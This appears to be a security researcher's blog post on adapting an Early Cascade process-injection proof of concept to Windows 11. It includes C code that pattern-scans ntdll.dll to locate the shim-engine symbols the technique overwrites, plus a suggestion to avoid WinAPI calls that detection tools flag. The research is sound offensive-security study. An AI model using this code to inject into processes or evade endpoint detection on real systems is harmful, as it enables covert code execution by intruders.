Early Cascade Injection

learning about early cascade injection, fixing for Win11, disassembly nonsense

Intro

Early Cascade injection was documented by Outflank as a novel process injection technique. The technique requires locating and modifying specific symbols in the .data and .mrdata sections of ntdll.dll in a remote process, which enables code execution via a callback routine.

This blog post will not go into all of the details of the technique, since it was covered in the original research blog post.

Instead, this blog post will cover how I played with the proof-of-concept code from @5pider and reversed a method to find offsets needed to execute on Windows 11 targets.

Here is my very simplified overview of the steps performed during the injection method:

  1. Spawn a process in a suspended state.
  2. Locate the offsets to g_ShimsEnabled & g_fnSE_DllLoaded inside of ntdll.dll.
  3. Set g_ShimsEnabled boolean to 1 (true) in the suspended process.
  4. Overwrite the function pointer for g_fnSE_DllLoaded with the address of shellcode stub.
  5. Resume the thread.
  6. Shellcode stub immediately flips g_ShimsEnabled back to false (0).
  7. Shellcode stub queues an APC routine which executes after LdrInitializeThunk routine.

Finding Offsets

A crucial step for this injection technique is the ability to locate the addresses of:

  • g_ShimsEnabled boolean value
  • g_fnSE_DllLoaded function pointer

g_pfnSE_DllLoaded is located in the .mrdata section and g_ShimsEnabled is in the .data section of ntdll.dll.

I found this helper function on Twitter from @m4ul3r_0x00 to help locate the memory addresses of those values in order to modify them later.

VOID FindOffsets()
{
    PBYTE ptr;
    ULONG offset1, offset2;
    int i = 0;

    // Get the starting address
    ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlQueryDepthSList");
    if (!ptr) {
        printf("[!] Failed to locate RtlQueryDepthSList\\n");
        return;
    }

    // Scan memory until end of LdrpInitShimEngine (0xC3CC pattern)
    while (i != 2) {
        if (*(PWORD)ptr == 0xCCC3) {
            i += 1;
        }
        ptr++;
    }

    // Scan memory until 0x488B3D pattern (mov rdi, qword [rel g_pfnSE_DllLoaded])
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x3D8B48) {
        ptr++;
    }

    // [ptr is here] mov rdi, qword [rel g_pfnSE_DllLoaded]
    offset1 = *(PULONG)(ptr + 3);               // Add 3 bytes to get to [rel g_pfnSE_DllLoaded]
    g_pfnSE_DllLoaded = ptr + offset1 + 7;      // Find absolute address of g_pfnSE_DllLoaded (8 bytes)

    // Scan memory until 0x443825 pattern (cmp byte [rel g_ShimsEnabled], r12b)
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x253844) {
        ptr++;
    }

    // [ptr is here] cmp byte [rel g_ShimsEnabled], r12b
    offset2 = *(PULONG)(ptr + 3);           // Add 3 bytes to get to [rel g_ShimsEnabled]
    g_ShimsEnabled = ptr + offset2 + 7;     // Find absolute address of g_ShimsEnabled (8 bytes)
}

Here is a breakdown of the function:

  • Finding g_pfnSE_DllLoaded
    • The first while loop tries to move the pointer to the end of the LdrpInitShimEngine function by matching the byte pattern for the end of a function 0xC3CC. (it’s reversed because little-endian)
    • Then the next while loop searches for the next byte pattern which matches the instructions mov rdi, qword [rel g_pfnSE_DllLoaded], but only matches the first 3 bytes 0x488B3D by using the mask 0xFFFFFF.
    • It determines the index pointer is now only 3 bytes away from the relative address of g_pfnSE_DllLoaded.
    • So add 3 bytes to the current index to land at [rel g_pfnSE_DllLoaded] , then you can calculate the absolute address of g_pfnSE_DllLoaded.
// [ptr is here now] mov rdi, qword [rel g_pfnSE_DllLoaded]
offset1 = *(PULONG)(ptr + 3);               // Add 3 bytes to get to [rel g_pfnSE_DllLoaded]
g_pfnSE_DllLoaded = ptr + offset1 + 7;      // Find absolute address of g_pfnSE_DllLoaded (8 bytes)
  • Finding g_ShimsEnabled
    • Then the last while loop searches for the byte pattern which matches the instructions cmp byte [rel g_ShimsEnabled], r12b (remember this for later 😉).
    • After it finds the pattern it does the same as above and calculates the absolute address of g_ShimsEnabled
// [ptr is here] cmp byte [rel g_ShimsEnabled], r12b
offset2 = *(PULONG)(ptr + 3);           // Add 3 bytes to get to [rel g_ShimsEnabled]
g_ShimsEnabled = ptr + offset2 + 7;     // Find absolute address of g_ShimsEnabled (8 bytes)

After the memory addresses for these global symbols are located the rest of the cascade injection technique can continue.

The Problem

This code worked fine when I tested on Windows 10, but failed on Windows 11 😢.

I decided to try and ‘fix’ this to also work on Windows 11.

My hypothesis:

The memory signatures inside of ntdll.dll in this PoC are probably not exactly the same on Windows 11, so the code fails to locate either g_ShimsEnabled or g_pfnSE_DllLoaded or both.

Let’s Fix It ⚒️

In order for this injection method to work on Windows 11 we have to reproduce the methodology above or come up with a more reliable method of locating the addresses.

Debugging NTDLL.DLL

So I loaded ntdll.dll into Binary Ninja on a Windows 11 machine with debug symbols to start analyzing the PE file.

As you saw in the function above, it first gets the address of the exported function RtlQueryDepthSList.

// Get the starting address
ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlQueryDepthSList");
if (!ptr) {
    printf("[!] Failed to locate RtlQueryDepthSList\\n");
    return;
}

In Binja we can browse to the Symbols tab to view all functions since we have debug symbols included in the DLL. I searched for the symbol of function and clicked into it to start analyzing it.

Great, next the PoC counted down 2 functions by looking for ret instructions (0xC3CC).

// Scan memory until end of LdrpInitShimEngine (0xC3CC pattern)
while (i != 2) {
    if (*(PWORD)ptr == 0xCCC3) {
        i += 1;
    }
    ptr++;
}

The code was nicely commented, so I knew it expected the pointer to land at the end of LdrpInitShimEngine after this.

Wait! In the screenshot above you can see the 3rd function down is RtlAllocateAndInitializeSid not LdrpInitShimEngine.

The functions in ntdll.dll appear to be in a different order on Windows 11. At least now we know where to begin…

Reversing Original PoC

First I needed to figure out why the PoC chose the end of LdrpInitShimEngine as the function to stop after.

I determined it was chosen because the next function was supposed to be LdrpLoadShimEngine which contains two VERY important instructions in it:

  • mov rdi, qword [rel g_pfnSE_DllLoaded]
  • cmp byte [rel g_ShimsEnabled], r13b

LdrpLoadShimEngine references both of the variables we need by their relative addresses. This means that we can grab those addresses and calculate their absolute addresses in memory.

This is what the function for Win10 does.


So I basically stuck with the original PoC’s methodology to get it working for Win11.

The function will do the following:

  1. Find the closest exported function to LdrpLoadShimEngine.
  2. Get the address of that exported function.
  3. Move the index pointer ‘x’ number of ret's until it’s at LdrpLoadShimEngine.
  4. Look for the byte pattern that references the variable’s relative address’s.
  5. Calculate their absolute address’s.
  6. Finish the injection steps.

Find the Closest Exported Function

The ntdll.dll library has many exported and non-exported functions. For any exported function we could simply use GetProcAddress in order to get a pointer to the function. But since LdrpLoadShimEngine is not an exported function we have to find the closest exported one and then count forwards (or backwards).

We can start at LdrpLoadShimEngine and count backwards until we see an exported function.

Six (6) ret’s above we can see RtlUnlockMemoryBlockLookaside which is an exported function, meaning we can easily get the address to it with GetProcAddress.

Now we can update our code to use RtlUnlockMemoryBlockLookaside as the starting function and count 6 ret’s down to find LdrpLoadShimEngine.

// Get the starting address
ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlUnlockMemoryBlockLookaside");
if (!ptr) {
    printf("[!] Failed to locate RtlUnlockMemoryBlockLookaside\\n");
    return;
}

// Scan memory until end of LdrpInitializeDllPath function. The next function will be LdrpLoadShimEngine
while (i != 6) {
    if (*(PWORD)ptr == 0xCCC3) {
        i += 1;
    }
    ptr++;
}

Fixing Byte Signature

Now there is just one more thing to address. I found while analyzing LdrpLoadShimEngine that Win11 uses a different register for the cmp instruction.

// Windows 10
cmp     byte [rel g_ShimsEnabled], **r12b**
// Windows 11
cmp     byte [rel g_ShimsEnabled], **r13b**

Win10 uses r12b but Win11 uses r13b. This means that the pattern matching logic from the PoC will fail to find the correct address since the bytes are different.

We can easily update the code to check for 0x44382D instead of 0x443825.

while ((*(PDWORD)ptr & 0xFFFFFF) != 0x2D3844) {
    ptr++;
}

Final Thoughts

After making those changes to the function I was able to successfully execute the injection method on Windows 11.

The final updated function looks like this:

// Values to overwrite in NTDLL
PVOID g_pfnSE_DllLoaded = NULL;
PVOID g_ShimsEnabled = NULL;

/*
* Locate g_ShimsEnabled and g_pfnSE_DllLoaded on Windows 11 
*/
VOID FindOffsetsWin11()
{
/*
    On Windows 11, functions are ordered differently inside ntdll.
    We want to find RtlUnlockMemoryBlockLookaside because it's the closest exported function to
    LdrpLoadShimEngine (which contains the instructions we want).
*/
    PBYTE ptr;
    ULONG offset1, offset2;
    int i = 0;

    // Get the starting address
    ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlUnlockMemoryBlockLookaside");
    if (!ptr) {
        printf("[!] Failed to locate RtlUnlockMemoryBlockLookaside\\n");
        return;
    }
    
    // Scan memory until end of LdrpInitializeDllPath function. The next function will be LdrpLoadShimEngine
    while (i != 6) {
        if (*(PWORD)ptr == 0xCCC3) {
            i += 1;
        }
        ptr++;
    }

    /*
        Should locate byte pattern inside of LdrpLoadShimEngine.
        Looking for 0x488B3D  (mov     rdi, qword [rel g_pfnSE_DllLoaded])
    */
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x3D8B48) {
        ptr++;
    }

    // [ptr is here] mov rdi, qword [rel g_pfnSE_DllLoaded]
    offset1 = *(PULONG)(ptr + 3);               // Add 3 bytes to get to [rel g_pfnSE_DllLoaded]
    g_pfnSE_DllLoaded = ptr + offset1 + 7;      // Find absolute address of function pointer g_pfnSE_DllLoaded (8 bytes)

    /*
        Should locate byte pattern inside of LdrpLoadShimEngine.
        Looking for 0x44382D  (cmp     byte [rel g_ShimsEnabled], r13b)
    */
    while ((*(PDWORD)ptr & 0xFFFFFF) != 0x2D3844) {
        ptr++;
    }

    // [ptr is here] cmp byte [rel g_ShimsEnabled], r12b
    offset2 = *(PULONG)(ptr + 3);           // Add 3 bytes to get to [rel g_ShimsEnabled]
    g_ShimsEnabled = ptr + offset2 + 7;     // Find absolute address of g_ShimsEnabled (8 bytes)
}

Improvements

I had the AI wizard generate me a function to determine the Windows version then execute the correct FindOffsets function.

Some improvements to this code could be:

  • Avoid suspicious WinAPI calls (GetProcAddress, GetModuleHandleA, WriteProcessMemory, ResumeThread)
  • More reliable method of locating the symbols in NTDLL

The final code can be found on my GitHub here.

Credits